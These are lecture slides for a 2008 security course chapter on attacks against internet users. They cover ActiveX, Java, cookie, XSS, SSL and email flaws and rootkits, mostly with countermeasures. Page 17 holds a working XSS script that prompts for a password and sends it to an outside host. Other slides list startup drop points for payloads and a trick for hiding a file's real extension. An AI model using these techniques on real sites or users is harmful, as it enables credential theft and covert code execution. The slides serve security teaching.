Chapter 13 Hacking the Internet User Last modified 12-30-08.

Transcript of Chapter 13 Hacking the Internet User Last modified 12-30-08.

Page 1: Chapter 13

Hacking the Internet User

Last modified 12-30-08

Page 2: Internet Client Vulnerabilities

Page 3: Microsoft ActiveX

ActiveX applications, or controls, can be written to perform specific functions (such as displaying a movie or sound file)

They can be embedded in a web page to provide this functionality

ActiveX controls typically have the file extension .ocx

They are embedded within web pages using the <OBJECT> tag

Page 4: Microsoft ActiveX

Controls are downloaded to the location specified by the Registry string value
– HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ActiveXCache

The default location on Windows XP and Vista is %systemroot%\Downloaded Program Files

Page 5: ActiveX Controls on a Vista Machine

Page 6: The ActiveX Security Model: Authenticode

ActiveX controls can do almost anything

But they can be signed with a digital signature (Authenticode), so you know who to blame

Exploder was a signed control that shut down Win 95 machines
– Link Ch 13_01

Page 7: "Safe for Scripting" Vulnerability

scriptlet.typelib and Eyedog.ocx
– ActiveX controls shipped with IE 4 and earlier
– Marked "Safe for scripting"
– Enabled to run without a warning, bypassing Authenticode

Page 8: "Safe for Scripting" Vulnerability

"Safe for Scripting" controls can be abused by malicious Web pages to execute arbitrary code
– This exploit was demonstrated in 1999
  Link Ch 13_02
– But later examples of "Safe for Scripting" exploits exist
  From 2005, as part of the Sony Rootkit
  – Link Ch 13_03
  A nice tutorial from 2008 (link Ch 13_04)

Page 9: ActiveX Abuse Countermeasures

IE Users:
– Restrict or disable ActiveX with Internet Explorer security zones
  In IE, Tools, Internet Options, Security tab

Developers:
– Don't write safe-for-scripting controls that could perform dangerous acts, like file access

Page 10: ActiveX Abuse Countermeasures

Developers:
– Use SiteLock to restrict access so that the control is only deemed safe in a predetermined list of domains
  Link Ch 13_05
– Disable unwanted ActiveX controls with the Kill Bit
  Link Ch 13_06

Page 11: Java

Java runs in a "sandbox" using the Java Virtual Machine, which makes it much safer than ActiveX

But flaws that allow code to escape the sandbox have been discovered
– Type confusion attack in 1999
– Brown Orifice in 2000 (link Ch 13_07)
– Java Virtual Machine remote compromise by heap overflow in 2005 (link Ch 13_08)

Page 12: Java Abuse Countermeasures

Restrict Java through the use of Microsoft Internet Explorer security zones

Keep your Java platform updated

Page 13: JavaScript and Active Scripting

JavaScript was created by Netscape in the mid-1990s
– It has nothing to do with Sun's Java

Microsoft platforms execute JavaScript and other client-side scripting languages (such as Microsoft's own VBScript) using a Component Object Model (COM)-based technology called Active Scripting

JavaScript is powerful and easy to use, and often used for malicious purposes, such as pop-up ads

Page 14: JavaScript/Active Scripting Abuse Countermeasures

Use Internet Explorer security zones

Use the "NoScript" Firefox extension

Page 15: Cookies

Cookies allow websites to remember who you are from visit to visit

Sniffing cookies can reveal data, or allow you to "sidejack" authenticated sessions

Page 16: Cookie Abuse Countermeasures

In IE, you can control cookie handling in Internet Options on the Privacy tab

Use SSL when possible
– https://mail.google.com, not gmail.com

Page 17: Cross-Site Scripting (XSS)

This script will harvest passwords from unwary users
– <SCRIPT Language="Javascript">var password=prompt('Your session has expired. Please enter your password to continue.',''); location.href="http://samsclass.info?passwd="+password;</SCRIPT>

Demo at http://fog.ccsf.edu/~sbowne/feedback-vulnerable.html

Many other attacks are possible, such as stealing cookies

Page 18: Cross-Frame/Domain Vulnerabilities

Like XSS, but operating on the client
– Tricking your browser into executing code from one frame in a different frame

IE has access to the local file system, calling it the Local Machine Zone (LMZ)
– A common target for attacks
– There are a lot of Cross-Frame attacks at link Ch 13_09

Page 19: Cross-Frame/Domain Vulnerabilities

The IFRAME Tag
– IFrames add a frame from another site in the middle of a Web page
– Used in many attacks
– A lot of IFrame attacks are underway right now (May, 2008)
  Link Ch 13_10

HTML Help ActiveX Control
– Runs in the LMZ zone
– A popular target for exploits

Page 20: SSL Attacks

When it works, SSL ensures that a server is genuine, and warns the client if a man-in-the-middle (MITM) attack is in progress

But Netscape failed to re-check later connections to the same IP address, which made it possible to perform an undetected MITM attack
– From the year 2000, link Ch 13_10

Page 21: SSL Vulnerabilities in IE

IE failed to check server names and expiration dates on certificates

Failed to revalidate certificates on reconnection to the same server

Errors in SSL Certificate Revocation List (CRL)-checking routines
– See links Ch 13_11, 13_12

Page 22: Homograph Attacks

Using non-English language characters, it was possible to buy a domain name that looked like paypal.com but wasn't

This has been patched in the latest browser versions
– Link Ch 13_13

Page 23: SSL Attack Countermeasures

Keep your Internet client software fully updated and patched

Check certificates manually

Page 24: Payloads and Drop Points

Places to put code to make it launch at startup
– Microsoft Excel .xla file or compiled HTML help file (.chm) in a user's Windows startup folder
– Run keys in the Windows Registry
– Using the showHelp() method and Microsoft's HTML Help hh.exe to launch .chm and .htm files directly from exploits
– Dropping malicious links into the IE startup page Registry values

Page 25: Auto-Start Extensibility Points (ASEPs)

Link Ch 13_15

Page 26: Windows Defender

Page 27: Msconfig

Page 28: E-mail Hacking

File Attachments
– Windows scrap files can be used to execute code
– File extensions can be hidden with spaces
  freemp3.doc . . . [150 spaces] . . . .exe
– IFrames can be used to execute an attached file within an HTML-enabled email
– Just trick the user into opening the attachment with social engineering, as MyDoom did in 2004 (link Ch 13_16)

Error message about attachment

Page 29: Multi-part Internet Mail Extensions (MIME)

In 2000, executable file types were automatically executed within IE or HTML e-mail messages if they were mislabeled as the incorrect MIME type

The Nimda Worm exploited this vulnerability
– Although the patch was available, it had not been implemented widely enough
– Link Ch 13_17

Page 30: E-mail Hacking Countermeasures

Patch the vulnerabilities

Disable rendering of HTML mail altogether

Block ActiveX and JavaScript in Email
– Microsoft Outlook and Outlook Express now set the Restricted Sites zone for reading e-mail by default

Don't open attachments you don't expect

Page 31: Instant Messaging (IM)

Tricks users into clicking on links or accepting file transfers

May also exploit IM software vulnerabilities
– Link Ch 13_18

Page 32: Microsoft Internet Client Exploits

Page 33: GDI+ JPEG Processing Buffer Overflow (IE6 SP1)

– Allowed remote control on any machine that renders a malicious JPEG (Link Ch 13_19)

Countermeasures
– Firewall that filters outgoing traffic might block the remote control
– Updated antivirus software
– Install updates and patches
– Read email in text-only format
– Run as a Limited user, not an Administrator

Page 34: IE showModalDialog Cross-Zone Exploit

A modal dialog box retains the input focus while open
– The user cannot switch windows until the dialog box is closed

Can access files on the local system and execute them in a privileged manner

Used by the 180 Solutions Trojan to install adware
– Link Ch 13_20

Page 35: IE Cross-Zone Local Resource Access Countermeasures

Patch your browser

Disable Active Scripting in the Local Computer Zone
– Link Ch 13_21

Run as a Limited user, not Administrator

Page 36: IE Improper URL Canonicalization

IE failed to properly display in its address bar any URLs of the format
– user@domain
when a nonprinting character (%01, or 1 in hexadecimal) was placed before the "@" character

IE 7 now warns you of this

Link Ch 13_22

Page 37: IE HTML Help Control Local Execution

Opens a Microsoft help page on the C: drive, in the Local Machine Zone (LMZ)

The exploit code then opens a second window, which injects executable JavaScript into the LMZ window
– Can install software on the local machine

Page 38: General Microsoft Client-Side Countermeasures

Use a firewall that can filter outgoing connections

Keep up-to-date on patches

Use antivirus software

Use IE Security Zones wisely

Run with least privilege, not as Administrator

Read email in plaintext

Page 39: General Microsoft Client-Side Countermeasures

Administrators of large networks should deploy firewalls at key points and use Group Policy to enforce security measures

Set the kill bit on unneeded ActiveX controls

Change Windows default configurations

Page 40: General Microsoft Client-Side Countermeasures

Configure office productivity programs as securely as possible
– Set the Microsoft Office programs to "Very High" macro security under Tools | Macro | Security

Don't be gullible. Approach Internet-borne solicitations and transactions with high skepticism

Keep your computing devices physically secure

Page 41: Use IE Security Zones wisely

In IE, Tools, Internet Options, Security tab
– Set Internet zone to "High"
– Then click Custom and disable ActiveX
– Add necessary sites to the Trusted zone

Page 42: Set the Kill Bit on Unneeded ActiveX Controls

See link Ch 13_06

Page 43: Skip pages 612-635

Page 44: Rootkits and Back Doors

Page 45: DKOM (Direct Kernel Object Manipulation)

From a PowerPoint written by Jamie Butler

Link Ch 13_25

Page 46: Operating System Design

User Land
– Operating system provides common API for developers to use
  Kernel32.dll
  Ntdll.dll

Kernel Mode
– The low level kernel functions that implement the services needed in user land
– Protected memory containing objects such as those for processes, tokens, ports, etc.

Page 47: Operating System Design

Intel has four privilege levels or rings

Microsoft and many other OS vendors use only two rings

Page 48: Operating System Design

By only using two privilege levels, there is no separation between the kernel itself and third party drivers or loadable kernel modules (LKMs)

Drivers can modify the memory associated with kernel objects such as those that represent a process's token

Page 49: Consumers demand more…

Corporations and many private consumers see the need for more security
– Personal firewalls
– Host based intrusion detection systems (HIDS)
– Host based intrusion prevention systems (HIPS)

Page 50: Current HIDS/HIPS Functions

To detect or prevent:
– Processes running
– Files that are created/deleted/modified
– Network connections made
– Privilege escalation

Trusts the operating system to report these activities.

If the underlying operating system is compromised, the HIDS/HIPS fails.

Page 51: What Makes HIDS/HIPS Possible?

Querying kernel reporting functions

Hooking user land API functions
– Kernel32.dll
– Ntdll.dll

Hooking the System Call Table

Registering OS provided call-back functions

Page 52: Attack Scenario

Attacker gains elevated access to computer system

Attacker installs a Rootkit

Rootkit's functions
– Hide processes
– Hide files
– Hide network connections
– Install a backdoor for future access to the system

Rootkits act as a part of the operating system so they have access to kernel memory.

Page 53: State of Current Rootkits

Until recently, rootkits were nothing more than Trojan programs such as ps, ls, top, du, and netstat

Advanced rootkits filter data
– Hook the System Call Table of the operating system (the functions exported by the kernel)
– Hook the Interrupt Descriptor Table (IDT)
  Interrupts are used to signal to the kernel that it has work to perform.
  By hooking one interrupt, a clever rootkit can filter all exported kernel functions.

Page 54: Demonstration: Hacker Defender Rootkit

Hides files, processes, network connections, and more

Works on Win XP SP2

Damages the OS
– Use a VM and discard it when done!

Page 55: Other Common Rootkits

FU - consists of two components: a user-mode dropper (fu.exe) and a kernel-mode driver (msdirectx.sys)

Vanquish - a DLL injection-based Romanian rootkit

AFX Rootkit by Aphex is composed of two files, iexplore.dll and explorer.dll, which it names "iexplore.exe" and "explorer.exe" and copies to the system folder